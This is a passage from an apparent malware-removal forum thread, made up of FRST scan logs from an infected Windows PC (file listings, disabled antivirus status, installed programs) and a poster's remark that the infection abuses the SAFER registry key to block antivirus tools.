2014-08-22 16:12 - 2014-08-23 16:20 - 00038790 _____ () C:\Windows\PFRO.log

2014-08-22 15:52 - 2014-08-23 16:16 - 00000000 ____D () C:\Qoobox

2014-08-22 14:32 - 2014-08-22 15:42 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable

2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps

2014-08-22 14:00 - 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro

2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs

2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development

2014-08-22 13:25 - 2014-08-23 11:16 - 00000782 _____ () C:\Windows\setupact.log

2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log

2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll

2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat

2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys

2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy

2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft

2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe

2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe

2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG2014

2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData

2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014

2014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe

2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc

2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers

2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc

2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate

2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers

2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe

2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe

2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe

2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe

2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer

2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe

2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe

2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe

2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe

2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe

2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled

2014-08-14 18:20 - 2014-08-23 16:22 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job

2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk

2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk

2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys

2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5

2014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag

2014-08-14 18:19 - 2014-08-22 13:27 - 00000000 ____D () C:\Program Files\Glary Utilities 5

2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft

2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe

2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys

2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe

2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe

2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe

2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe

2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe

2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe

2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe

2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe

2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe

2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk

2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes

2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1

2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod

2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime

2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk

2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime

2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch

2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495

2014-08-12 18:02 - 2014-08-22 16:10 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495

2014-08-12 17:58 - 2014-08-15 03:47 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir

2014-08-12 16:53 - 2014-08-22 21:40 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu

2014-08-12 16:51 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-23 16:54 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST

2014-08-23 16:54 - 2014-07-18 00:39 - 01159804 _____ () C:\Windows\WindowsUpdate.log

2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro

2014-08-23 16:30 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys

2014-08-23 16:30 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk

2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware

2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes

2014-08-23 16:27 - 2006-11-02 06:33 - 00694332 _____ () C:\Windows\system32\PerfStringBackup.INI

2014-08-23 16:22 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job

2014-08-23 16:21 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job

2014-08-23 16:21 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT

2014-08-23 16:21 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0

2014-08-23 16:21 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0

2014-08-23 16:20 - 2014-08-22 16:12 - 00038790 _____ () C:\Windows\PFRO.log

2014-08-23 16:16 - 2014-08-23 16:16 - 00009460 _____ () C:\ComboFix.txt

2014-08-23 16:16 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox

2014-08-23 16:13 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini

2014-08-23 14:48 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT

2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas

2014-08-23 14:32 - 2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss

2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public

2014-08-23 14:20 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT

2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis

2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita

2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt

2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt

2014-08-23 11:53 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner

2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt

2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT

2014-08-23 11:25 - 2014-08-23 11:23 - 00001106 _____ () C:\Users\savas.kyriakidis\Desktop\Live PC Help.lnk

2014-08-23 11:16 - 2014-08-22 13:25 - 00000782 _____ () C:\Windows\setupact.log

2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag

2014-08-23 11:05 - 2014-08-23 11:02 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy

2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE

2014-08-22 21:40 - 2014-08-12 16:53 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu

2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp

2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK

2014-08-22 16:10 - 2014-08-12 18:02 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495

2014-08-22 15:42 - 2014-08-22 14:32 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable

2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps

2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D () C:\ProgramData\AVAST Software

2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs

2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development

2014-08-22 13:27 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 5

2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log

2014-08-21 22:25 - 2011-12-22 18:52 - 00000680 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat

2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google

2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk

2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk

2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google

2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series

2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll

2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat

2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy

2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft

2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys

2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG2014

2014-08-17 17:23 - 2011-07-10 20:09 - 00000000 ____D () C:\$AVG

2014-08-17 16:31 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData

2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe

2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe

2014-08-16 18:01 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG

2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData

2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014

2014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe

2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc

2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc

2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers

2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC

2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix

2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate

2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers

2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc

2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office

2014-08-15 19:54 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system

2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT

2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe

2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT

2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe

2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer

2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe

2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe

2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe

2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet

2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe

2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe

2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe

2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe

2014-08-15 03:47 - 2014-08-12 17:58 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir

2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled

2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys

2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5

2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft

2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe

2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe

2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe

2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe

2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe

2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe

2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe

2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe

2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe

2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk

2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk

2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes

2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1

2014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes

2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod

2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple

2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple

2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime

2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk

2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime

2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud

2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google

2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch

2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495

2014-08-12 17:13 - 2011-08-28 07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL Folders

2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff

2014-08-12 16:51 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh

2014-08-04 03:06 - 2014-08-14 18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-08-23 16:28

==================== End Of Log ============================

jjoyner1985 · August 23, 2014

Forgot to mention that this infection also edits the safer key in the registry to disable the anti-viral programs on the computer. Removing the safer\codeidentifiers\0\path part of the key allows those programs to run until the block is put back in place a few minutes later.

Addition.txt

Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014

Ran by savas.kyriakidis at 2014-08-23 16:55:17

Running from F:\

Boot Mode: Normal

==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Disabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}

AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}

AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}

AS: Microsoft Security Essentials (Disabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version: - Microsoft)

32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden

6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden

6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden

6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) Hidden

Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)

Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) Hidden

ActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)

Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)

Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) Hidden

Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)

Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)

Akamai NetSession Interface (HKCU\...\Akamai) (Version: - Akamai Technologies, Inc)

Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version: - Any-Video-Converter.com)

Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)

Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)

ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )

AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)

AVG 2011 (Version: 10.0.1388 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1390 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1391 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1392 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1410 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1416 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.2109 - AVG Technologies) Hidden

Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)

bpd_scan (Version: 3.00.0000 - Hewlett-Packard) Hidden

BPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) Hidden

BPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) Hidden

Browser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)

BufferChm (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Catalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) Hidden

